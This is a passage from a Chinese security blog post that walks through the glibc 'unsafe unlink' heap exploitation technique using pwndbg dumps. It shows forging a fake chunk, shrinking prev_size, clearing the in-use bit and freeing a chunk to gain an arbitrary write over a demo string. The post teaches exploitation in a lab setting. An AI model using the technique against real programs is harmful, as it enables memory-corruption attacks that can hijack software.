<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/10gx 0x602058</span><br><span class="line">0x602058:       0x0000000000000000      0x00007ffff7dd2540</span><br><span class="line">0x602068 :      0x0000000000000000      0x0000000000603010&lt;-bk</span><br><span class="line">0x602078:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x602088:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x602098:       0x0000000000000000      0x0000000000000000</span><br></pre></td></tr></table></figure>
<p>看到了吗,此时的fake_chunk-&gt;fd-&gt;bk=0x603010,还记得我们刚刚所说的吗,我们所伪造的fake_chunk就是0x603010</p>
<p>因此第一个条件fake_chunk-&gt;fd-&gt;bk=fake_chunk达成,同理我们康康第二个条件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/10gx 0x602060</span><br><span class="line">0x602060 &lt;stderr@@GLIBC_2.2.5&gt;: 0x00007ffff7dd2540      0x0000000000000000</span><br><span class="line">0x602070 &lt;chunk0_ptr&gt;:  0x0000000000603010      0x0000000000000000</span><br><span class="line">0x602080:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x602090:       0x0000000000000000      0x0000000000000000</span><br><span class="line">0x6020a0:       0x0000000000000000      0x0000000000000000</span><br></pre></td></tr></table></figure>
<p>同样的,我们成功达成了第二个条件,此时的fake_chunk也就是指向我们全局变量的chunk0_ptr已经可以bypass了,现在值得注意的是刚刚我们假设size已经设好了,但其实并没有</p>
<p>那么根据程序所说,假设我们可以溢出chunk0来自由的更改chunk1的内容,我们就可以通过更改chunk1的pre_size域来使得我们的chunk收缩以骗过malloc让他认为我们的chunk1的上一个chunk是从我们的fake chunk处开始的</p>
<p>emmmm,关于heap shrink,可以康康我之前的另一篇<a href="https://nightrainy.github.io/2019/07/25/chunk-extend-and-overlapping/">文章</a></p>
<p>拓展和收缩原理相同:)</p>
<p>好了,我们继续</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"> 36   uint64_t *chunk1_hdr = chunk1_ptr - header_size;</span><br><span class="line">► 37   fprintf(stderr, &quot;We shrink the size of chunk0 (saved as &apos;previous_size&apos; in chunk1) so that free will think that chunk0 starts where we placed our fake chunk.\n&quot;);</span><br></pre></td></tr></table></figure>
<p>现在程序运行到了这里,之前程序所定义的header_size是2,那么chunk1_ptr-2是什么东西呢?</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p/x chunk1_ptr -2</span><br><span class="line">$23 = 0x603090</span><br><span class="line">pwndbg&gt; p/x chunk1_ptr</span><br><span class="line">$24 = 0x6030a0</span><br><span class="line">pwndbg&gt; p/x 0x6030a0-0x603090</span><br><span class="line">$25 = 0x10</span><br></pre></td></tr></table></figure>
<p>这里需要注意哦,指针的加减和平常的加减不太一样,这里我也写了个小demo,其实是从之前的文章里扒来的</p>
<p>demo.c</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">int main()</span><br><span class="line">&#123;</span><br><span class="line">        long long *chunk1,*chunk2;</span><br><span class="line">        chunk1=malloc(0x80);</span><br><span class="line">        chunk2=malloc(0x80);</span><br><span class="line">        chunk1=100;</span><br><span class="line">        chunk2=200;</span><br><span class="line">        printf(&quot;%p\n&quot;,&amp;chunk1);</span><br><span class="line">        printf(&quot;%p\n&quot;,chunk1);</span><br><span class="line">        printf(&quot;%p\n&quot;,&amp;chunk2);</span><br><span class="line">        printf(&quot;%p\n&quot;,chunk2);</span><br><span class="line">        printf(&quot;%p\n&quot;,chunk1-3);</span><br><span class="line">        printf(&quot;%p\n&quot;,chunk1-2);</span><br><span class="line">        printf(&quot;%p\n&quot;,chunk1-1);</span><br><span class="line">        printf(&quot;%p\n&quot;,&amp;chunk1-3);</span><br><span class="line">        printf(&quot;%p\n&quot;,&amp;chunk1-2);</span><br><span class="line">        printf(&quot;%p\n&quot;,&amp;chunk1-1);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>编译运行结果</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&apos;╰─# ./test</span><br><span class="line">0x7ffdd51db3f8</span><br><span class="line">0x64</span><br><span class="line">0x7ffdd51db400</span><br><span class="line">0xc8</span><br><span class="line">0x4c</span><br><span class="line">0x54</span><br><span class="line">0x5c</span><br><span class="line">0x7ffdd51db3e0 //chunk1-3</span><br><span class="line">0x7ffdd51db3e8 //chunk1-2</span><br><span class="line">0x7ffdd51db3f0 //chunk1-1</span><br></pre></td></tr></table></figure>
<p>从小demo里就可以稍微理解指针加减了叭(雾</p>
<p>好的,下面我们继续分析.</p>
<p>程序做了什么呢?</p>
<p>程序将chunk1_ptr向前16位的地址赋给了我们的chunk1_hdr,这是做什么呢?</p>
<p>我们知道程序给我们的用户指针其实是free chunk的fd指针,因此向前16就意味着是chunk的pre_size域</p>
<p>我们继续让程序执行到给他赋值的地方,此时答案呼之欲出,这里的作用就是为了实现我们刚刚所说的堆缩,heap shrink:)</p>
<p>我们看下现在的堆</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; heap</span><br><span class="line">0x603000 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 0x91,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x602058,</span><br><span class="line">  bk_nextsize = 0x602060 &lt;stderr@@GLIBC_2.2.5&gt;</span><br><span class="line">&#125;</span><br><span class="line">0x603090 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0x80,</span><br><span class="line">  size = 0x91,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br><span class="line">0x603120 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 134881,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>看到了吗,这里chunk1的prev_size已经被设为了0x80,这也就意味着系统向前找chunk的时候会向前0x80找到我们的fake_chunk</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p/x 0x603090-0x80</span><br><span class="line">$27 = 0x603010</span><br></pre></td></tr></table></figure>
<p>但这并不够,我们需要伪造chunk1是free态的chunk,那么只需要把标志位设位0就好了,程序继续运行到下一断点</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">42   chunk1_hdr[1] &amp;= ~1;</span><br></pre></td></tr></table></figure>
<p>这里是一个赋0的操作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; heap</span><br><span class="line">0x603000 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 0x91,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x602058,</span><br><span class="line">  bk_nextsize = 0x602060 &lt;stderr@@GLIBC_2.2.5&gt;</span><br><span class="line">&#125;</span><br><span class="line">0x603090 &#123;</span><br><span class="line">  prev_size = 0x80,</span><br><span class="line">  size = 0x90,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br><span class="line">0x603120 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 134881,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>好了,万事具备,只欠东风:)</p>
<p>free chunk1,这时就会发生unlink(为什么请看文章开头unlink时机</p>
<p>这里就是触发了free的后向合并从而调用unlink函数,此时的堆结构</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; heap</span><br><span class="line">0x603000 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 145,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x20ff1,</span><br><span class="line">  fd_nextsize = 0x602058,</span><br><span class="line">  bk_nextsize = 0x602060 &lt;stderr@@GLIBC_2.2.5&gt;</span><br><span class="line">&#125;</span><br><span class="line">0x603090 &#123;</span><br><span class="line">  prev_size = 128,</span><br><span class="line">  size = 144,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br><span class="line">0x603120 PREV_INUSE &#123;</span><br><span class="line">  prev_size = 0,</span><br><span class="line">  size = 134881,</span><br><span class="line">  fd = 0x0,</span><br><span class="line">  bk = 0x0,</span><br><span class="line">  fd_nextsize = 0x0,</span><br><span class="line">  bk_nextsize = 0x0</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>我们现在给chunk0_ptr[3]赋值,将chunk0_ptr[3]指向victim_string的内存<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p/x &amp;victim_string</span><br><span class="line">$40 = 0x7fffffffe640</span><br><span class="line">pwndbg&gt; p/x chunk0_ptr</span><br><span class="line">$31 = 0x7fffffffe640</span><br><span class="line">pwndbg&gt; p/x chunk0_ptr[3]</span><br><span class="line">$37 = 0x7ffff7a2d830</span><br></pre></td></tr></table></figure></p>
<p>这时我们可以发现,我们虽然修改的是chunk0_ptr[3],但其实修改的是chunk0_ptr的值</p>
<p>让程序继续跑,修改一下chunk0_ptr的值</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p victim_string</span><br><span class="line">$63 = &quot;BBBBAAAA&quot;</span><br></pre></td></tr></table></figure>
<p>完美:)</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>依旧,程序先是弄了一个全局变量chunk0_ptr,紧接着给他申请了0x80实际上是0x90的内存空间</p>
<p>之后新建了一个大小一样的chunk1_ptr</p>
<p>这时我们要确定的是我们的全局指针是chunk0_ptr,要攻击的chunk是chunk1_ptr</p>
<p>之后程序构造了P-&gt;FD-&gt;BK=P和P-&gt;BK-&gt;FD=P的条件,想要伪造一个fake_chunk</p>
<p>假设我们拥有溢出的能力,修改chunk1_ptr的pre_size域让系统认为我们的上一个chunk是我们伪造的fake chunk,并且将chunk1_ptr的size域标志位置0以伪造其被free的假象</p>
<p>然后程序free掉了chunk1触发了free的后向合并从而调用了unlink函数,此时我们的攻击就算结束了</p>
<p>而程序的攻击效果就是将本来是P处的指针变为了P-0x18的指针,我们就拥有了任意内存读写的能力,over~</p>
<p>文章首发于安全客，转载请著名出处，文章链接<a href="https://www.anquanke.com/post/id/197481" target="_blank" rel="noopener">https://www.anquanke.com/post/id/197481</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        <li title="0" data-url="http://link.hhtjim.com/163/5146554.mp3"></li>
                    
                        <li title="1" data-url="http://link.hhtjim.com/qq/001faIUs4M2zna.mp3"></li>
                    
                </ul>
            
        </div>
        
    <div id="gitalk-container" class="comment link" data-ae="false" data-ci="" data-cs="" data-r="" data-o="" data-a="" data-d="false">查看评论</div>


    </div>
    
</div>


    </div>
</div>
</body>
<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/diaspora.js"></script>
<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">
<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>




</html>
